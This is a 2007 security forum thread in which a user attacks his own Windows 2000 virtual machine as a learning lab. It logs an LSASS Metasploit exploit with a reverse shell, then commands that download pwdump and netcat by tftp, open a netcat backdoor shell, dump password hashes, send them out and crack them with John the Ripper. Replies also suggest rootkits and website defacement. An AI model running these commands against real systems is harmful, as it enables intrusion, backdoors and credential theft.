Penetration Tester's Lab - Hack your own machine (win2k sp4)

grindcore · **Joined:** Thu Oct 16, 2003 4:37 pm **Posts:** 63

I just install windows 2000 pro sp4 into vmware & now I want to do some penetration testing on this machine…hopefully u can help me to find all vulnerabilities in this machine…

Quote:

bt ~ # nmap -sS -O 192.168.0.10

Starting Nmap 4.20 ( http://insecure.org ) at 2007-06-27 19:08 GMT
Interesting ports on 192.168.0.10:
Not shown: 1692 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
3372/tcp open msdtc
MAC Address: 00:0C:29:B5:45:09 (VMware)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000, SP0, SP1, or SP2
Network Distance: 1 hop

Then I run metasploit to find out what kind of vulnerabilities that exist in the system.
& I manage to penetrate using ms04_011_lsass exploit…

Quote:

msf exploit(ms04_011_lsass) > exploit
[*] Started reverse handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.10[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.0.10[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.0.11:4444 -> 192.168.0.10:1093)
[*] The DCERPC service did not reply to our request

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>hostname
hostname
grindcore-test

i also run lan guard...but nothing much i can get from it...

mmm....besides that, what else i can do to penetrate into this machine..if u wanna get the same result, u can set up your own windows 2000 pro sp4 with default configuration...i just put the password into the administrator.

freedom_is_chaos · **Joined:** Sun May 21, 2006 3:49 pm **Posts:** 2511

From there you could install a rootkit to hide yourself. Trying having someone else set the password, so you have to crack it, or exploit yourself into admin or higher.

Nice job though.

drewch · **Joined:** Fri May 18, 2007 9:17 pm **Posts:** 418

Good stuff, I've been meaning to set up VMWare but haven't found the time.

freedom_is_chaos wrote:

exploit yourself into admin or higher.

Godmode user?

icebear42 · **Posted:** Thu Jun 28, 2007 1:35 am

drewch wrote:

[...]

freedom_is_chaos wrote:

exploit yourself into admin or higher.

Godmode user?

The SYSTEM-account is higher than the administrator.

drewch · **Joined:** Fri May 18, 2007 9:17 pm **Posts:** 418

icebear42 wrote:

drewch wrote:

[...]

freedom_is_chaos wrote:

exploit yourself into admin or higher.

Godmode user?

The SYSTEM-account is higher than the administrator.

I suspected there was something I didn't know about. Thank you very much.

grindcore · **Joined:** Thu Oct 16, 2003 4:37 pm **Posts:** 63

thanks to all for your respond & feedback...
fyi, when i use lsass exploit, it will send the reverse shell back to me with administrator privilege..
means now i can do whatever i want to do to this machine..

and for this learning purposes, i'm not intend to hide myself using anykind of rootkit or whatever trojan coz i just wanna find way to get in into the system...
& what kind of exploit that can be used against windows 2000 profesional sp4 besides lsass exploit.

after this, i plan to install iis and try to deface the website...

drewch · **Joined:** Fri May 18, 2007 9:17 pm **Posts:** 418

Check out SecurityFocus.com, will give you a list of all exploits for any vendor/application/version combination. So you can find more 2000 exploits, perhaps even ones that aren't in metasploit so you can also exploit compiling it yourself, and maybe change the code for different payloads etc. Then you can install different vulnerable versions of IIS and go from there.
Have fun.

grindcore · **Joined:** Thu Oct 16, 2003 4:37 pm **Posts:** 63

i know bout that, security focus, buqtraq, ...that's y i'm asking ur advice here especially those who already done this kind of testing before...
the machine, windows 2000 sp4 was configure with default configuration..
i do nothing unless change the administrator password

John Doe · **Posted:** Thu Jun 28, 2007 2:36 pm

Quote:

i didn't do nothing unless

grindcore · **Joined:** Thu Oct 16, 2003 4:37 pm **Posts:** 63

continue from last session, this time i'll create backdoor using netcat & do the password assessment using john the ripper...

after got the shell, i'll download a few tools from my pc...

Code:

tftp -i 192.168.0.11 get pwdump4.exe
tftp -i 192.168.0.11 get pwdump4.dll
tftp -i 192.168.0.11 get nc.exe

then, run netcat's for backdoor purposes on port 2111

Quote:

nc -L -p 2111 -e cmd.exe

from win2k machine, run this command to get the password hash

Code:

pwdump4 /l /o:pwdump4.txt

send that hash to my machine

Quote:

tftp 192.168.0.11 put pwdump4.txt

last thing to do for today, do the password assessment

Code:

john -w:wordlist.txt pwdump4.txt

that's it...and game over...

p/s - i'll appreciate for any comment or suggestion to improve my skills.. for the next lab, i'll install iis for unicode exploit's lab...

Hack In The Box Forums

Penetration Tester's Lab - Hack your own machine (win2k sp4)

Who is online